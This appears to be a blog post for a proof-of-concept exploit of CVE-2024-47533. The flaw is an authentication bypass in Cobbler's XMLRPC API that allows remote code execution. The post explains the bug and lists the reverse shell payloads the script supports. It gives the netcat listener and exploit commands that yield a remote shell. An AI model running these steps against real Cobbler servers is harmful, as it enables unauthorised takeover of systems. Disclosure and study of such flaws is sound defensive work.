CVE-2024-47533 - Cobbler XMLRPC Authentication Bypass RCE Exploit POC
CVE-2024-47533 is a critical authentication bypass vulnerability in Cobbler (versions 3.0.0 to before 3.2.3 and 3.3.7) allowing unauthenticated remote code execution via the XMLRPC interface.
โ ๏ธ Critical Remote Code Execution via Authentication Bypass in Cobbler
๐ ๏ธ PoC implementation by @dollarboysushil
๐ก Overview
Cobbler, a Linux installation server that enables rapid setup of network installation environments, has an authentication vulnerability in versions 3.0.0 up to (but not including) 3.2.3 and 3.3.7. The function utils.get_shared_secret() always returns -1, allowing anyone to connect to the Cobbler XML-RPC interface with an empty username (โโ) and password -1. This lets an attacker with network access gain full control of the Cobbler server. The vulnerability is fixed in versions 3.2.3 and 3.3.7.
๐ Technical Breakdown
The vulnerability is caused by improper handling of the shared secret in the utils.get_shared_secret() function, which always returns -1, effectively bypassing authentication. This lets any network user connect to Cobblerโs XMLRPC interface with empty credentials and execute arbitrary commands.
๐ฅ Vulnerable Endpoint
http://<target>:25151/ โ Cobblerโs XMLRPC API endpoint
๐ฅ Example Payloads
The exploit script supports various reverse shell payloads including:
- Bash reverse shell
- Netcat shells (
nc,nc2) - Python reverse shell
- Curl download & execute
๐ฌ Proof-of-Concept (PoC) Demonstration
Github Repo link
๐ก Preparing the Listener
Start a Netcat listener on your machine:
1
nc -lvnp 4444
๐ Launching the Exploit
Run the exploit script CVE-2024-47533-dbs.py.
1
python3 CVE-2024-47533-dbs.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash
๐ป Successful Remote Shell Access
Upon successful execution, the reverse shell will connect back to the listener, granting the attacker remote access to the server.
